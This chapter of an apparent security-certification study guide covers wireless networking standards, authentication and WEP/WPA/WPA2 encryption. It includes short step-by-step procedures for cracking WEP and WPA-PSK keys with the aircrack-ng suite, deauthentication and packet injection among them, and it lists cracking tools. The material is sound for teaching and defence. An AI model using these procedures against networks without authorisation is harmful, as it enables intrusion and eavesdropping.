Download Hacking Wireless Networks

In this chapter, we will learn about wireless networks, various types of wireless networks, Wi-Fi
authentication modes, and types of wireless encryption. This chapter focuses on wireless hacking
methodology, Bluetooth hacking, and Wireless penetration testing.
15.1 Understand wireless networks, various types of wireless networks, and Wi-Fi authentication
modes
Exam Focus: Understand wireless networks, various types of wireless networks, and Wi-Fi
authentication modes. Objective includes:




Understand wireless networks.
Gain insights on wireless networks.
Understand various types of wireless networks.
Understand Wi-Fi authentication modes.
Wireless network
A wireless network refers to any type of computer network that is wireless, and is commonly
associated with a telecommunications network whose interconnections between nodes are
implemented without the use of wires. Wireless telecommunications networks are generally
implemented with some type of remote information transmission system that uses
electromagnetic waves, such as radio waves, for the carrier and this implementation usually takes
place at the physical level or "layer" of the network.
Wi-Fi
Wi-Fi was developed on the IEEE 802.11 standard. It is widely used in wireless communication.
It is used to provide wireless access to applications and data across a radio network. Wi-Fi
establishes different ways to set up a connection between the transmitter and the receiver such as
DSSS, FHSS, Infrared, and OFDM. The following are the advantages of wireless networks:




Installation is fast and easy and it eliminates wiring via walls and ceilings.
It is easier to provide connectivity in places where laying cable is difficult.
The network can be accessed from anywhere within the range of an access point.
Constant internet connections using wireless LAN are used in public places such as
airports, libraries, and schools.
The following are the disadvantages of wireless networks:



Wireless networks are not very secure.
The bandwidth suffers as the number of computers on the network increases.
There are some electronic equipment that can interfere with the Wi-Fi networks.
Wireless terminologies
Some important wireless terminologies are given below:
Terminologies
Description
GSM
It is a standard developed by the European Telecommunications Standards
Institute (ETSI) that defines protocols for 2G digital cellular networks used
by mobile phones.
Directional
antenna
It sends and receives signals from a specific direction.
Omni-directional
antenna
It is a vertical antenna system which sends or receives signals in all
directions.
Wi-Fi Finder
It is used to find a Wi-Fi network.
Association
It is the process of connecting a wireless device to an access point.
Authentication
It is the process of identifying a device before allowing it to access the
network resources.
BSSID
It is an identifier used to identify a particular BSS (Basic Service Set) within
an area.
WPA
It is an advanced security protocol for WLAN. It uses TKIP, MIC, and AES
encryption.
WEP
It is a security protocol for WLANs. It has two components, authentication
and encryption.
Gigahertz
It is a unit of frequency equal to one thousand million hertz (1,000,000,000
Hz).
Hotspot
It represents a place where a wireless network is available for public use.
Access point
It connects wireless devices to a wireless network.
ISM band
It is a frequency band that is reserved internationally for the use of radio
frequency (RF) energy for industrial, scientific, and medical purposes except
communications.
Bandwidth
It is a measurement of how much data can be sent in a period of time.
Types of wireless networks
The following are types of wireless networks:


WPAN: WPAN is a wireless personal area network that interconnects devices centered
on an individual person's workspace. A wireless personal area network uses a technology
that permits communication within a range of 20 feet. WPAN operates at frequencies of
around 2.4 GHz in digital modes and supports only eight active devices. It is defined in
the IEEE 802.15 standard. Bluetooth is an example of a wireless personal area network.
WLAN: A wireless LAN (or WLAN, for wireless local area network, sometimes referred
to as LAWN, for local area wireless network) is one in which a mobile user can connect
to a local area network (LAN) through a wireless (radio) connection. The IEEE 802.11 is
a group of standards that specifies the technologies for wireless LANs. 802.11 standards
use the Ethernet protocol and CSMA/CA (carrier sense multiple access with collision
avoidance) for path sharing and include an encryption method, the Wired Equivalent
Privacy algorithm.


High-bandwidth allocation for wireless will make possible a relatively low-cost wiring of
classrooms in the United States. A similar frequency allocation has been made in Europe.
Hospitals and businesses are also expected to install wireless LAN systems where
existing LANs are not already in place.
WMAN: Wireless Metropolitan Area Network (WMAN) represents a wireless network
that connects two or more wireless LANs in the same geographical area. WMANs are
used as backbone services as well as point-to-point and point-to-multipoint links, which
are implemented using high-speed connections such as T1, T3, etc. WMAN is also
known as a Wireless Local Loop (WLL). WMANs are defined in the IEEE 802.16
standard. An example of Wireless Metropolitan Area Network is WiMAX, which
provides last-mile access as an alternative to broadband services such as DSL or cable
connections. WiMAX provides fixed, roaming, portable and soon mobile wireless
broadband connectivity without the need of direct line of sight with a base station.
WWAN: WWAN, which stands for Wireless Wide Area Network, is a form of wireless
network. A WWAN differs from WLAN (wireless LAN) in that it uses Mobile
telecommunication cellular network technologies, such as WiMAX (though it is better
applied to WMAN Networks), UMTS, GPRS, CDMA2000, GSM, CDPD, Mobitex,
HSDPA, or 3G to transfer data. It can also use LMDS and Wi-Fi to connect to the
Internet. These cellular technologies are offered regionally, nationwide, or even globally
and are provided by a wireless service provider, typically on paid basis. This type of
connectivity allows a user with a laptop and a WWAN card to surf the web, check email,
or connect to a Virtual Private Network (VPN) from anywhere within the regional
boundaries of cellular service. Various computers now have integrated WWAN
capabilities (such as HSDPA in Centrino). This means that the system has a cellular radio
(GSM/CDMA) built in, which allows the user to send and receive data.
WLAN summarized!
Wireless Local Area Network (WLAN) is a network that enables devices to connect to the
network wirelessly. WLAN uses radiated energy, commonly called high-frequency radio waves,
to communicate amongst nodes.
Organizations that Influence WLAN Standards
The four major organizations that set or influence WLAN standards are described below:


ITU-R: International Telecommunications Union-Radio communication (ITU-R) is a
worldwide organization of United Nations. It works for standardization of
communications that use radiated energy. Its prime objective is to manage the assignment
of frequencies.
IEEE: Institute of Electrical and Electronic Engineers (IEEE) is a society of technical
professionals. It promotes the development and application of electro-technology and
allied sciences. IEEE develops communications and network standards, among other
activities. The organization publishes a number of journals. The organization has many
local chapters and societies in specialized areas.


Wi-Fi Alliance: Wi-Fi Alliance is an industry consortium that encourages
interoperability of products that use WLAN standards. The consortium runs a
certification program and recognizes products, which are implementing WLAN
standards, as Wi-Fi certified products.
FCC: Federal Communications Commission (FCC) is an independent US government
agency. It regulates interstate and international communications by radio, television,
wire, satellite, and cable in the United States of America.
Modes of Wireless LANs
There are two modes of WLANs: ad hoc mode and infrastructure mode.
Ad hoc mode WLAN: An ad hoc network consists of two or more wireless devices that
communicate directly with each other. The wireless local area network (WLAN) network
interface adapters in the wireless devices generate omni-directional signals within a limited range
called Basic Service Area (BSA). When two wireless devices come within the range of each
other, they immediately form a two-node network and are able to communicate with each other.
An ad hoc network is non-transitive.
Infrastructure mode WLAN: An infrastructure network consists of an access point that
connects wireless devices to the standard cable network. An access point is connected to a cabled
network through a cable and it generates omni-directional signals. When wireless devices come
within the range of the access point, they are able to communicate with the cabled local area
network.
The access point works as a central bridge device to include wireless devices in the cabled LAN.
Wireless Technologies
802.11: This is the latest networking specification for wireless local area networks (WLANs),
developed by the Institute of Electrical and Electronic Engineers. It contains several subspecifications, and the IEEE is constantly adding new specifications. This specification uses
Carrier Sense Multiple Access with Collision Avoidance (CSMS/CA) media access control
mechanism. 802.11 supports 1 or 2 Mbps transmission in the 2.4 GHz ISM band using
Frequency Hopping Spread Spectrum (FHSS).
802.11x: It contains various specifications for the 802.11 family of Wireless LAN network
standards. Some of the specifications in this family are still under development. The 802.11b
specification uses Direct Sequence Spread Spectrum (DSSS) and supports 11 Mbps transmission
in the 2.4 GHz band.
Infrared: The Infrared technology uses invisible infrared radiations to transmit signals to short
distances. There are two types of networks communication possible, one in which the sender and
the receiver are visible to each other and are situated in a straight line known as line-of-sight
mode; the other type of communication known as diffuse mode does not require the sender and
receiver to be directly visible to each other. This technology is used in TV sets, cordless
microphones, laptops, remote modems, printers, and other peripheral devices. Infrared networks
use frequencies in the terahertz range and support transmission speeds of 1 to 2 Mbps.
Bluetooth: The Bluetooth technology uses short-range radio frequencies to transmit voice and
data signals at the speed of 1 Mbps on a frequency of 2.4 Ghz. Bluetooth is used to automatically
synchronize information among different types of computers like desktops, laptops, and
palmtops, or connecting to the Internet through a cell phone.
Important Protocols
WAP: Wireless Application Protocol (WAP) supports mobile computing. It was developed by
the WAP forum. The functionality of WAP is equivalent to that of TCP/IP. WAP uses a smaller
version of HTML called Wireless Markup Language (WML) to display Internet sites.
WEP: Wired Equivalent Privacy (WEP) is a security protocol for wireless local area networks
(WLANs). It has two components, authentication and encryption. It provides security which is
equivalent to wired networks for wireless networks. WEP encrypts data on a wireless network by
using a fixed secret key. WEP incorporates a checksum in each frame to provide protection
against the attacks that attempt to reveal the key stream.
Infrastructure network
Infrastructure is a basic topology of a wireless network. An infrastructure network consists of an
access point that connects wireless devices to the standard cable network. An access point is
connected to the cabled network through a cable and it generates omni-directional signals. When
wireless devices come within the range of the access point, they are able to communicate with
the cabled local area network.
The access point works as a central bridge device to include wireless devices in the cabled LAN.
Wireless standards
The following are wireless standards:







802.11a: The IEEE 802.11a standard for WLAN uses the U-NII spectrum at 5GHz. It
uses the Orthogonal Frequency Division Multiplexing (OFDM) encoding class. The
maximum speed supported by the 802.11a standard is 54Mbps.
802.11b: 802.11b is an amendment to the IEEE 802.11 specification that extended the
throughput up to 11 Mbit/s using the same 2.4 GHz band. This specification under the
marketing name of Wi-Fi has been implemented across the world. 802.11b is used in a
point-to-multipoint configuration, wherein an access point communicates via an omnidirectional antenna with one or more nomadic or mobile clients that are located in a
coverage area around the access point.
802.11g: The 802.11g standard, defined by IEEE, is an extension to the 802.11b standard
of a wireless network. It operates in the 2.4-GHz band and brings data rates up to
54Mbps, using the Orthogonal Frequency-Division Multiplexing (OFDM) technology.
Since the 802.11g standard is backward compatible with 802.11b, an 802.11b device can
interface directly with an 802.11g access point.
802.11i: The 802.11i standard of IEEE specifies the security mechanisms for Wireless
LAN (WLAN). The standards include authentication and encryption.
802.11n: IEEE 802.11n is an upcoming improvement to the IEEE 802.11-2007 wireless
networking standard to improve the network throughput over previous standards, such as
802.11b and 802.11g. The IEEE 802.11n standard offers data rates from 54 Mbps to a
maximum of 600 Mbps. The current state of the art supports a physical rate of 450 Mbps,
with the use of 3 spatial streams at a channel width of 40 MHz. Depending on the
environment, this may translate into a user throughput of 110 Mbps.
802.16: IEEE 802.16 is a set of Wireless Broadband standards authorized by the IEEE.
IEEE 802.16 is written by a workgroup of IEEE Standards Board in 1999 to develop
standards for the global deployment of broadband Wireless Metropolitan Area Networks.
The workgroup is a unit of the IEEE 802 LAN/MAN Standards Committee. IEEE 802.16
standard is also known as the wireless metropolitan area network (Wireless MAN)
standard.
Bluetooth: Bluetooth supports a very short range (10 meters) and relatively low
bandwidth (1-3 Mbps). It is designed for low-power network devices.
IEEE 802 Members
The Institute of Electrical and Electronics Engineering (IEEE) is a leading organization in the
world. It constituted a task force to set standards for connectivity between NIC and transmission
media. This task force is known as the 802 committee. The 802 committee was subdivided into
several sub groups, and each group is responsible for the implementation of a single standard that
specifies the data transfer that occurs at the data link layer of the OSI model. A brief description
of these sub groups are described below:
802.1
This standard is responsible for data communication between all seven layers of the OSI model.
802.2
It defines LLC (Logical layer control) sub layer of data link layer that is used by lower layer
protocols.
802.3
The 802.3 standard defines Ethernet and the functions related to MAC (medium access control)
sub layer of the data link layer. There are different types of transmission media in 802.3.




1BASE5: The data transfer rate is 1Mbps and it uses UTP cable with a signal range up to
500 meters. In this standard, the star topology is used.
10BASE5: It is also known as thick Ethernet and it supports data transfer rate of 10Mbps
with a signal range up to 500 meters. In this standard, coaxial thicknet cable is
implemented.
10 BASE2: It uses thinnet coaxial cable and has a data transfer speed of 10Mbps. In this
standard, the bus topology is used.
10BASE F: It implements fiber optics cable. The data transfer rate is 10Mbps.
Conceived in the 1960s, the Ethernet (802.3) is the oldest and most popular data link layer
protocol (or network technology) used in today's networks. Ethernet networks use a bus or star
topology and control the flow of data through the media access control (MAC) method known as
Carrier Sense Multiple Access Collision Detection (CSMA/CD). The use of CSMA/CD ensures
that each computer in a network can send its signals over the network. To send signals over the
network, a computer waits for the network to be free of any traffic. If the network is free, the
computer sends its signals that travel through the network and are received by the destination
computer. Sometimes more than one computer sends its signals over the network, which results
in a collision. Collisions in these types of networks cannot be avoided, as CSMA/CD can detect
it only when they occur. It then resends the data over the network again to compensate the data
loss.
Ethernet networks run at various speeds, depending on the type of topology and cabling used.
Ethernet technology is widely implemented in the star topology using coaxial or fiber optic
cables, and in the bus topology using UTP cable.
802.4
This defines a network with the bus topology that implements media access control with token
mechanism.
802.5
This defines a network with the ring topology. It uses media access control with token
mechanism. It supports data transfer rate of 1, 4, and 16 Mbps. Originally developed by IBM, the
token ring is an intricate but highly dependable networking technology that follows the IEEE
802.5 standard. The type of topology used in this technology is physically a star, but
implemented logically as a ring, in which all the computers are attached to a central unit called a
multistation access unit (MAU OR MSAU). Token ring networks use token passing to send their
signals over the network. Token is a type of data packet, which circulates in the entire network.
If the token is free, the computer waiting to send data takes it, attaches the data and the
destination address to the token, and sends it. When the token reaches its destination computer,
the data is received. Then, the token gets back to the originator. If the originator finds that the
message has been received, it removes the message from the token. Now, the token is free and
can be used by other computers in the network to send data.
Token ring networks are more fault tolerant than the Ethernet, as the MSAU ensures that the
failure of a single computer does not bring the entire network down. It is an intelligent device,
which identifies the failing computer in the network, and then bypasses it to correct the errors.
The modern day token ring networks use unshielded twisted pair (UTP) cable and run at speeds
of 16 Mbps as opposed to the original token ring networks developed by IBM that used shielded
twisted pair (STP) cable and ran at 4 or 16 Mbps.
802.6
This describes MAN standard known as Distributed Queue Dual Bus (DQDB). DQDB is
designed for data, voice, and video transmission through fiber optics cable. The dual bus
topology is employed and traffic on each bus is unidirectional.
802.8
This standard deals with the implementation of fiber optics technology in networking
environment.
802.11
The IEEE 802.11 standards define wireless local area network (WLAN) computer
communication in the 5GHz and 2.4GHz public spectrum bands. These specifications define an
over-the-air interface between a wireless client and a base station or access point. The 802.11
specifications also define standards among wireless clients. These specifications address both the
Physical (PHY) and Media Access Control (MAC) layers and are tailored to resolve
compatibility issues between manufacturers of wireless LAN equipment.
Apart from these IEEE standards, there is one more standard named FDDI developed by ANSI.
FDDI (Fiber Distributed Data Interface)
Developed by the American National Standards Institute (ANSI), FDDI is a ring-based network
that uses fiber optic cables to provide very fast and reliable communication between the
connected computers. It uses token passing to control the network access but does not use a hub
like the token ring networks; instead, it uses a central device called a concentrator to connect the
computers in the network. In these networks, the computers are connected using a physical ring
topology.
There are two types of configurations used by FDDI networks, namely class A and class B
configurations. In class A, a double ring topology is used in which the computers are connected
to two rings. The signals travel in the opposite directions on both the rings. If there is a fault in
one ring, the receiving computer can still receive the signal through the other ring. These
networks provide a better fault tolerance. Class B networks use a single physical ring and are,
therefore, less fault tolerant.
FDDI networks run at speeds of 100 Mbps and, as they use fiber optic cables, provide
connectivity over long distances. These networks have now been replaced by Fast Ethernet
networks that provide the same speed and are more fault tolerant.
SSID
SSID stands for Service Set Identifier. It is used to identify a wireless network. SSIDs are case
sensitive text strings and have a maximum length of 32 characters. All wireless devices on a
wireless network must have the same SSID in order to communicate with one another. The SSID
on computers and the devices in WLAN (Wireless Local Area Network) can be set manually and
automatically.
Configuring the same SSID as that of the other Wireless Access Points (WAPs) of other
networks will create a conflict. A network administrator often uses a public SSID that is set on
the access point. The access point broadcasts SSID to all wireless devices within its range. Some
newer wireless access points have the ability to disable the automatic SSID broadcast feature in
order to improve network security.
Wi-Fi authentication modes
The open system authentication process includes the following steps:
1. A client sends an 802.11 authentication management frame that includes its SSID.
2. Access Point (AP) checks the client's SSID and sends back an authentication verification
frame.
3. The client connects to the network.
The shared key authentication process includes the following steps:
1.
2.
3.
4.
5.
A client trying to connect sends an authentication request to Access Point (AP).
The AP sends challenge text.
The client encrypts challenge text and sends it back to the AP.
The AP decrypts challenge text and authenticates the client.
The client connects to the network.
Wi-Fi authentication process
The Wi-Fi authentication process includes the following steps:
1. The AP issues a challenge to the wireless client. The wireless client responds with his
identity.
2. The AP forwards the identity to the RADIUS server using the uncontrolled port.
3. The RADIUS server sends a request to the wireless station through the AP specifying the
authentication mechanism to be used.
4. The wireless station responds to the RADIUS server with its credentials through the AP.
5. The RADIUS server sends an encrypted authentication key to the AP if the credentials
are acceptable.
6. The AP generates a multicast/global authentication key encrypted with a per-station
unicast session key and transmits it to the wireless station.
Wi-Fi authentication process using a centralized authentication server
The Wi-Fi authentication process includes the following steps:
1.
2.
3.
4.
5.
A client requests a connection from Access Point (AP).
The AP sends EAP-request for identity to the client.
The client sends EAP-response with identity to the AP.
The AP forwards the identity to the RADIUS server using the uncontrolled port.
The RADIUS server sends a request to the wireless client through the AP specifying the
authentication mechanism to be used.
6. The wireless client responds to the RADIUS server with its credentials through the AP.
7. The RADIUS server sends an encrypted authentication key to the AP if the credentials
are acceptable.
8. The AP sends a multicast/global authentication key encrypted with a per-station unicast
session key.
Wi-Fi chalking
Some examples of Wi-Fi chalking are as follows:

Wardriving: Wardriving is a technique used to locate insecure wireless networks while
driving around. The following are wardriving tools:
o StumbVerter
o MiniStumbler
o ApSniff
o
o
o



Driftnet
WiFiFoFum
WarLinux
Warflying: Warflying is similar to wardriving. It includes flying around in an aircraft,
searching for open wireless networks.
Warchalking: Warchalking is the drawing of symbols in public places to advertise an
open Wi-Fi wireless network. Having found a Wi-Fi node, the warchalker draws a special
symbol on a nearby object, such as a wall, the pavement, or a lamp post. The name
warchalking is derived from the cracker terms war dialing and war driving.
Warwalking: Warwalking is a technique similar to wardriving. It is the act of walking
around with a Wi-Fi enabled laptop to get an access point for a wireless network.
Wi-Fi chalking symbols
Symbols
Description
Free Wi-Fi
Wi-Fi with MAC filtering
Restricted Wi-Fi
Pay for Wi-Fi
Wi-Fi with WPA
Wi-Fi with multiple access controls
Wi-Fi with closed SSID
Wi-Fi honeypot
Types of wireless antenna
The following are types of wireless antenna:


Omni-directional antenna: It is a vertical antenna system which sends or receives
signals in all directions. Signals generated through an omni antenna lose power as the
distance increases. Such antennas are used with Wireless Access Points (WAPs).
Parabolic antenna: A parabolic antenna is a high gain reflector antenna used for radio,
television, and data communications. It is the most efficient type of directional antenna. It
provides a large front/back ratio, a very sharp radiation angle, and small side lobes. The
relatively short wavelengths of electromagnetic radiation at these frequencies allow
reasonably sized reflectors to exhibit the desired highly directional response for both


receiving and transmitting. It is the best choice for noisy locations where other antennas
probably do not work.
Yagi antenna: It is a directional antenna. It comprises a dipole, a reflector, which is an
element bigger than the dipole, and one or more shorter elements as directors in front of
the dipole.
Dipole antenna: It is an antenna that can be made by a simple wire with a center-fed
driven element for transmitting or receiving radio frequency energy. This antenna is
simply a pair of two wires pointed in opposite directions, arranged either horizontally or
vertically, with one end of each wire connected to the radio and the other end hanging
free in space. Since this is the simplest practical antenna, it is also used as a reference
model for other antennas. The current amplitude on such an antenna decreases uniformly
from maximum at the center to zero at the ends.
MAC filtering
MAC filtering is a security access control technique that allows specific network devices to
access or prevent them from accessing the network. MAC filtering can also be used on a wireless
network to prevent certain network devices from accessing the wireless network. MAC addresses
are allocated only to hardware devices, not to persons.
15.2 Identify types of wireless encryption, and understand WEP encryption and WPA/WPA2
Exam Focus: Identify types of wireless encryption, and understand WEP encryption and
WPA/WPA2. Objective includes:




Identify types of wireless encryption.
Understand WEP encryption.
Understand WPA/WPA2.
Discuss wireless threats.
Types of wireless encryption
The following are the types of wireless encryption:








WEP: It is an old and original wireless security standard. It can be cracked easily.
WPA: It uses a 48 Initialization Vector (IV), and 32-bit CRC and TKIP encryption for
wireless security.
WPA2: It is used to provide network administrators with a high level of assurance that
only authorized users are able to access the network. It provides government grade
security by implementing the National Institute of Standards and Technology (NIST)
FIPS 140-2 compliant AES encryption algorithm.
WPA2 Enterprise: It integrates the EAP standard with WPA encryption.
TKIP: It is a security protocol. It is used in WPA as a replacement for WEP.
AES: It is a symmetric key encryption. It is used in WPA2 as a replacement for TKIP.
EAP: It uses multiple authentication methods.
LEAP: It is a proprietary WLAN authentication protocol.



RADIUS: It is considered as a centralized authentication and authorization management
system.
802.11i: It is an IEEE standard. It specifies security mechanism for 802.11 wireless
networks.
CCMP: It uses 128-bit keys with a 48-bit IV for replay protection.
WEP
WEP stands for Wired Equivalent Protection. It is a wireless security standard that uses either a
64-bit or a 128-bit encryption. It is the most commonly and widely accepted security standard.
Almost all the available operating systems, wireless access points, wireless bridges support this
security standard. WEP uses 24-bit initialization vector to form stream cipher RC4 for
confidentiality and the CRC-32 checksum for integrity of wireless transmission. It has major
vulnerabilities and design flaws.
The following is the working of WEP:
1.
2.
3.
4.
For the frame data, a 32-bit Integrity Check Value (ICV) is calculated.
The ICV is added at the end of the frame data.
A 24-bit Initialization Vector is produced and added to the WEP encryption key.
To generate a key stream, the combination of Initialization Vector and the WEP is used
as the input to RC4 algorithm.
5. To produce the encrypted data, the key stream is bit-wise XORed with the combination
of data and ICV.
6. To generate a MAC frame, the Initialization Vector is added to the encrypted data and
ICV.
WEP issues
The following are WEP issues:








The Initialization Vector is a 24-bit field and is sent in the cleartext portion of a message.
There is no defined method for encryption key distribution.
The reuse of the same IP for data protection produces identical key streams. Key streams
are repeated within a short time as the Initialization Vector is a short key.
The same Initialization Vector may be generated by wireless adapters from the same
vendor. This may help attackers to determine the key stream and decrypt the ciphertext.
It is difficult to change the WEP keys regularly due to lack of centralized key
management.
Associate and dissociate messages are not authenticated.
The RC4 keystream can be reconstructed on the basis of the Initialization Vector (IV) and
the decrypted payload of the packet when there is IV collision.
WEP does not provide cryptographic integrity protection. An attacker can flip a bit in the
encrypted stream by capturing two packets and modify the checksum to obtain the
packet.



Initialization Vector is a part of the RC4 encryption key. It results in an analytical attack.
In the analytic attack, the key is recovered after intercepting and analyzing a relatively
small amount of traffic.
WEP is based on a password. The password can be cracked using password cracking
attacks.
An attacker can make and use a decryption table of the reconstructed keystream to
decrypt the WEP packets in real-time.
Breaking WEP encryption
The following actions can be taken to break WEP encryption:
1. The injection capability of the wireless device to the access point should be tested.
2. Wi-Fi sniffing tools such as airodump-ng or Cain & Abel should be started with bssid
filter to collect unique IVs.
3. A cracking tool such as Cain & Abel or aircrack-ng should be run to extract encryption
keys from IVs.
4. The wireless monitor should be started in monitor mode on the specific access point
channel.
5. A tool such as aireplay-ng should be used to perform a fake authentication with the
access point.
6. A Wi-Fi packet encryption tool such as aireplay-ng should be started in ARP request
replay mode to inject packets.
Crack WEP using aircrack
Take the following steps to crack WEP using aircrack:
1. Monitor wireless traffic with airmon-ng and collect wireless traffic data with airodumpng.
2. Associate your wireless cars with the AP you are accessing with aireplay-ng and start
packet injection with aireplay-ng.
3. Decrypt the WEP key with aircrack-ng.
Countermeasures to prevent WEP cracking
A user can use some countermeasures to prevent WEP cracking. WEP is the least secure protocol
and it should not be used. However, a user can use the following methods to mitigate WEP
cracking:





Use a non-obvious key.
Use the longest key supported by hardware.
Change keys often.
Use WEP in combination with other security features, such as rapid WEP key rotation
and dynamic keying using 802.1x.
Consider WEP a deterrent, not a guarantee.
WPA
WPA stands for Wi-Fi Protected Access. It is a wireless security standard. It provides better
security than WEP (Wired Equivalent Protection). TKIP uses the RC4 stream cipher encryption
with 128-bit keys and 64 bit-keys for authentication. The WEP key derivation vulnerability is
mitigated by TKIP as TKIP does not involve reusing the same Initialization Vector. The client
starts with a 128-bit "temporal key" (TK) under TKIP. The 128-bit "temporal key" is then
combined with client's MAC address and with an Initialization Vector in order to create a key
used for encrypting data through the RC4.
TKIP adds a rekeying mechanism to WEP to provide fresh encryption and integrity keys.
Temporal keys are changed for every 10,000 packets, making TKIP protected networks more
resistant to cryptanalytic attacks that involve key reuse.
The following is the working of WPA:
1. To generate a Keystream, temporal encryption key, transmit address, and TKIP sequence
counters are used as input to the RC4 algorithm.
2. The Michael algorithm is used to combine MAC Service Data Unit (MSDU) and
message integrity check (MIC).
3. To generate MAC Protocol Data Unit (MPDU), the combination of MSDU and MIC is
fragmented.
4. For the MPDU, a 32-bit Integrity Check Value (ICV) is calculated.
5. To produce the encrypted data, the combination of MPDU and ICV is bitwise XORed
with Keystream.
6. To generate MAC frame, the Initialization Vector is added to the encrypted data.
Windows Vista supports both WPA-PSK and WPA-EAP.


WPA-PSK: PSK stands for Preshared key. This standard is meant for the home
environment. WPA-PSK requires a user to enter an 8-character to 63-character
passphrase into a wireless client. WPA converts the passphrase into a 256-bit key.
WPA-EAP: EAP stands for Extensible Authentication Protocol. This standard relies on a
back-end server that runs Remote Authentication Dial-In User Service for user
authentication.
Note: Windows Vista supports a user to use a smart card to connect to a WPA-EAP protected
network.
Temporal keys
During the four-way handshake, the encryption keys (temporal keys) are derived in WPA1 and
WPA2. Encryption keys are derived from the PMK that is derived during the EAP authentication
session. In the EAP success message, PMK is sent to the AP but is not directed to the Wi-Fi
client as it has derived its own copy of the PMK.
Crack WPA-PSK using Aircrack
Take the following steps to crack WPA-PSK using Aircrack:
1. Monitor wireless traffic with airmon-ng and collect wireless traffic data with airodumpng.
2. Deauthenticate the client using aireplay-ng. The client will attempt to authenticate with
the AP.
3. Run the capture file through aircrack-ng.
Defend against WPA cracking




Passphrases: Sniff the password PMK associated with the "handshake" authentication
process. It will be almost impossible to crack the password if it is extremely complicated.
Passphrase complexity: A random passphrase that is not made up of dictionary words
should be selected. A complex passphrase having the minimum length of 20 characters
should be selected and changed at regular intervals.
Client settings: WPA2 should only be used with AES/CCMP encryption. The client
settings should be set properly.
Additional controls: The virtual private network technology such as Remote Access
VPN, Extranet VPN, Intranet VPN, etc. should be used. A Network Access Control
(NAC) or Network Access Protection (NAP) solution should be implemented for
additional control over end-user connectivity.
WPA2
WPA2 is an updated version of WPA. This standard is also known as IEEE 802.11i. WPA2
offers enhanced protection to wireless networks than WPA and WEP standards. It is also
available as WPA2-PSK and WPA2-EAP for home and enterprise environment, respectively.
Break WPA/WPA2 encryption
WPA PSK initializes the TKIP by using a user defined password. As the TKIP is a per-packet
key, it is not crackable. However, the keys can be brute-forced using dictionary attacks.
WPA keys can be brute-forced using tools such as aircrack, aireplay, and KisMAC.
To capture the WPA/WPA2 authentication handshake, a user only needs to be near the AP for a
matter of seconds. A user can crack WPA keys offline by capturing the right type of packets.
WEP vs. WPA vs. WPA2
Attributes
Encryption algorithm
WEP
RC4
RC4, TKIP
WPA2
AES-CCMP
IV size
24-bit
48-bit
48-bit
Encryption key length
40/104-bit 128-bit
Integrity check mechanism CRC-32
WPA
128-bit
Michael algorithm and CRC-32 AES-CCMP
Initialization Vector (IV)
An initialization vector (IV) is a block of bits that is required to allow a stream cipher or a block
cipher to be executed in any of several streaming modes of operation to produce a unique stream
independent from other streams produced by the same encryption key, without having to go
through a re-keying process. The size of the IV depends on the encryption algorithm and on the
cryptographic protocol in use and is normally as large as the block size of the cipher or as large
as the encryption key. The IV must be known to the recipient of the encrypted information to be
able to decrypt it.
Weak Initialization Vectors
The Key Scheduling Algorithm creates an Initialization Vector (IV) on the basis of the base key
in the RC4 algorithm. A flaw in the WEP implementation of RC4 permits generation of weak
IVs. IVs become susceptible to weak key attacks due to the way keys are constructed from the
IV. Weak IVs give information regarding the key bytes they were derived from. In order to
reveal bytes of the base key, an attacker will gather enough weak IVs. Weak IVs involve the use
of the master key. It has no built-in provision for updating the keys.
WEP/WPA cracking tools
The following are WEP/WPA cracking tools:





WepAttack
Wesside-ng
WEPCrack
ChopChop
WeDecrypt
KisMAC
KisMAC is an open-source and free sniffer/scanner application for Mac OS X. It is more
advantageous than MacStumbler / iStumbler / NetStumbler, because it uses monitor mode and
passive scanning. KisMAC supports the 802.11b/g network. It reveals hidden, cloaked, or closed
SSIDs, shows logged in clients, and draws area maps of network coverage.
Elcomsoft Wireless Security Auditor
Network administrators use Elcomsoft Wireless Security Auditor to audit accessible wireless
networks. It has a built-in wireless network sniffer. It protects work sniffer. It protects your
wireless networks and tests the strength of WPA/WPA2 -PSK passwords.
AirSnort
AirSnort is a Linux-based WLAN WEP cracking tool that recovers encryption keys. AirSnort
operates by passively monitoring transmissions. It uses Ciphertext Only Attack and captures
approximately 5 to 10 million packets to decrypt the WEP keys.
WEPcrack
WEPcrack is a wireless network cracking tool that exploits the vulnerabilities in the RC4
algorithm, which comprises the WEP security parameters. It mainly consists of three tools:



WeakIVGen: It allows a user to emulate the encryption output of 802.11 networks to
weaken the secret key used to encrypt the network traffic.
Prism-getIV: It analyzes packets of information until ultimately matching patterns to the
one known to decrypt the secret key.
WEPcrack: It pulls all beneficial data of WeakIVGen and Prism-getIV to decipher the
network encryption.
Wireless threats
The following are wireless threats:





Wireless access control attack
Integrity attack
Confidentiality attack
Availability attack
Authentication attack
Wireless access control attack
The primary goal of a wireless access control attack is to penetrate a network by using WLAN
access control measures, such as AP MAC filters and 802.1X port access controls. Some
examples of wireless access control attacks are as follows:








Wardriving: In this attack, the attacker discovers wireless LANs by listening to beacons
or sending probe requests. Thus, it provides a launch point for further attacks.
Rogue access points: In this attack, the attacker installs an unsecured access point inside
a firewall to create an open backdoor into a trusted network.
Ad hoc associations: In this attack, the attacker connects directly to an unsecured station
to avoid AP security or to attack station.
MAC Spoofing: In this attack, the attacker reconfigures an attacker's MAC address to
mask as an authorized AP or station.
Promiscuous client: It is similar to an evil twin attack. The only difference is that a
promiscuous client is not based on fooling a user to get a free unsecured network. It
forces the user to connect to the unsecured network.
Client mis-association: In this attack, the attacker sets up a rogue access point outside
the corporate network and allows users to connect to it and bypass the security policies
through it.
Unauthorized association: In this attack, the attacker infects the victim's system and
activates soft access points, This allows attackers to access unauthorized connection to
the enterprise network.
AP misconfiguration: In this attack, the attacker steals SSID and connects to the access
point. To broadcast SSIDs to authorized users, access points are configured. Network
administrators incorrectly use SSIDs as passwords in order to verify authorized users.
Intruders use SSID broadcasting to steal an SSID and connect to the access point. SSID
broadcasting is a configuration error.
Integrity attack
An integrity attack sends forged control, management or data frames over a wireless network in
order to mislead the recipient or perform another type of attack. Some examples of the integrity
attack are as follows:








Data frame injection: In this attack, the attacker crafts and sends forged 802.11 frames.
WEP injection: In this attack, the attacker cracks WEP encryption keys using tools.
Data replay: In this attack, the attacker captures 802.11 data frames for later replay.
Initialization vector replay attack: In this attack, a known plaintext is sent to an
observable WLAN client. The attacker sniffs the WLAN that is predicted ciphertext and
finds out the known frame to originate the key stream. Then, he grows this key stream to
subvert the network.
Bit-flipping attack: In this attack, the attacker tampers with the payload of the frame for
modifying the higher layer packet.
Extensible AP replay: In this attack, the attacker captures 802.1X extensible
authentication protocols for later replay.
RADIUS replay: In this attack, the attacker captures RADIUS access-accept or reject
